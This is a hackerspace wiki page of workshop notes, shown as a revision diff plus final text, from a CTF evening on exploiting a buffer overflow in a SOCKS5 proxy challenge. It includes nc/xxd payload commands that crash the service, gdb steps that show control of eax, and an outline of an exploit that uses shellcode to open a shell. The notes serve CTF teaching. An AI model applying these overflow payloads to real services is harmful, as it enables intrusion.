Difference between revisions of "CTF-practice-evening:2014-08-04"

From Technologia Incognita
Jump to: navigation, search
 
(12 intermediate revisions by the same user not shown)
Line 18: Line 18:
  
 
* Brainsmoke is talking about binary exploitation today
 
* Brainsmoke is talking about binary exploitation today
 +
 +
== Examining the challenge ==
 +
 
* objdump -d: see the disassembly, sometimes you can see symbols
 
* objdump -d: see the disassembly, sometimes you can see symbols
 
** This example has mangled C++ symbols
 
** This example has mangled C++ symbols
Line 33: Line 36:
 
** We want to establish a connection
 
** We want to establish a connection
 
** We need to specify Socks5
 
** We need to specify Socks5
 +
 +
== Verifying the buffer overflow ==
 +
 
* Use xxd to construct the command  (converts hex code to binary, and vice-versa)
 
* Use xxd to construct the command  (converts hex code to binary, and vice-versa)
 
** Example: xxd -r -p <<< 41414141410a = AAA
 
** Example: xxd -r -p <<< 41414141410a = AAA
** xxd -r -p <<< 050100 | nc localhost 1080 | dd bs=1 > file
+
** xxd -r -p <<< 050100 | nc localhost 1080 | dd bs=1 > file (authentication)
 
** hexdump -C file
 
** hexdump -C file
 +
** xxd -r -p <<< 05010005010003ff:python<<<'print "A"*2000')  | nc localhost 1080 | dd bs=1 > file  (connection request)
 +
** We're following along w/ the protocol here
 +
** It crashed - a child exited with Signal 6 (SIGABT)
 +
** You can use gdb to find the segfault
 +
** Now we send the payload - nothing crashed, so the stopped child must have the connection
 +
** We continue it, and we see the segfault
 +
** You can use 'info reg' to see the register contents
 +
** eax now has the value of 0x41414141!
 +
** Also the instruction point (eip), we can look at what it's pointing at
 +
** You can use: x/i $eip  = call *0x8(%eax)
 +
** We have control over eax.  So we can get it to call code that we enter!
 +
** x/1000i Starting from the right instruction thread
 +
** x/32x 0x8058b80-32  (you can see 16 bytes of crap, and then our data, and then the address that we need)
 +
** (You can also oftentimes see the input you provide in the dmesg output that happens during the segfault)
 +
** xxd -r -p <<< 05010005010003ff:python<<<'print "A"*16 + "ABCD" + "A"*2000 ')  | nc localhost 1080 | dd bs=1 > file  (connection request)
 +
** We can use Metasploit cyclic patterns for this
 +
* He also used his own emulator w/ an elf loader
 +
** mimenu
 +
** It produces a taint tracking dump
 +
** We can see that there's a second area where the tainted data is stored
 +
** We have data at a known location - that's where we are going to want to put out code
 +
** We should note down the address
 +
** ebx is a heap pointer - if you use ASLR, then this will wind up in a different place every time
 +
 +
== Crafting the exploit ==
 +
 +
* He's changing the commandline script into a proper python program
 +
* He's reusing socket routines from an old exploit
 +
* He's also finding old previously used shellcode - the sample he's using works on lots of architectures - everything afterwards will be executed as a command
 +
* He's opening a shell - he's trying to reuse a variety of file descriptors w/ bash

Latest revision as of 19:43, 4 August 2014

CTF-practice-evening:2014-08-04
Date 2014/08/04
Time
Location ACTA
Type Workshop
Contact Melanie

Capture The Flag evening - Part 23

  • 4 August, 2014 - 7 PM
  • Please bring along a laptop with you!!!

General CTF Info

Binary Exploitation

  • Brainsmoke is talking about binary exploitation today

Examining the challenge

  • objdump -d: see the disassembly, sometimes you can see symbols
    • This example has mangled C++ symbols
  • From running it, the program appears to be a daemon of some kind - a Socks proxy
    • This is a proxy for TCP - we can look at the protocol details w/ Google
    • netstat -uplanet (we can see which ports are used)
  • What was added between Socks4 and Socks5? (there might be a bug)
    • Authentication and connecting directly to a domain
    • Most of the fields are fixed length
    • But the domain name is a string - it could have a buffer overflow
    • There's a 1 byte name length - if you use a 1 byte length, you might end up w/ a negative number
    • If you try to read a negative number, you will try to read a lot of bytes
  • We want to find out what happens when you tell the program to read and send 255 bytes
    • We want to establish a connection
    • We need to specify Socks5

Verifying the buffer overflow

  • Use xxd to construct the command (converts hex code to binary, and vice-versa)
    • Example: xxd -r -p <<< 41414141410a = AAA
    • xxd -r -p <<< 050100 | nc localhost 1080 | dd bs=1 > file (authentication)
    • hexdump -C file
    • xxd -r -p <<< 05010005010003ff:python<<<'print "A"*2000') | nc localhost 1080 | dd bs=1 > file (connection request)
    • We're following along w/ the protocol here
    • It crashed - a child exited with Signal 6 (SIGABT)
    • You can use gdb to find the segfault
    • Now we send the payload - nothing crashed, so the stopped child must have the connection
    • We continue it, and we see the segfault
    • You can use 'info reg' to see the register contents
    • eax now has the value of 0x41414141!
    • Also the instruction point (eip), we can look at what it's pointing at
    • You can use: x/i $eip = call *0x8(%eax)
    • We have control over eax. So we can get it to call code that we enter!
    • x/1000i Starting from the right instruction thread
    • x/32x 0x8058b80-32 (you can see 16 bytes of crap, and then our data, and then the address that we need)
    • (You can also oftentimes see the input you provide in the dmesg output that happens during the segfault)
    • xxd -r -p <<< 05010005010003ff:python<<<'print "A"*16 + "ABCD" + "A"*2000 ') | nc localhost 1080 | dd bs=1 > file (connection request)
    • We can use Metasploit cyclic patterns for this
  • He also used his own emulator w/ an elf loader
    • mimenu
    • It produces a taint tracking dump
    • We can see that there's a second area where the tainted data is stored
    • We have data at a known location - that's where we are going to want to put out code
    • We should note down the address
    • ebx is a heap pointer - if you use ASLR, then this will wind up in a different place every time

Crafting the exploit

  • He's changing the commandline script into a proper python program
  • He's reusing socket routines from an old exploit
  • He's also finding old previously used shellcode - the sample he's using works on lots of architectures - everything afterwards will be executed as a command
  • He's opening a shell - he's trying to reuse a variety of file descriptors w/ bash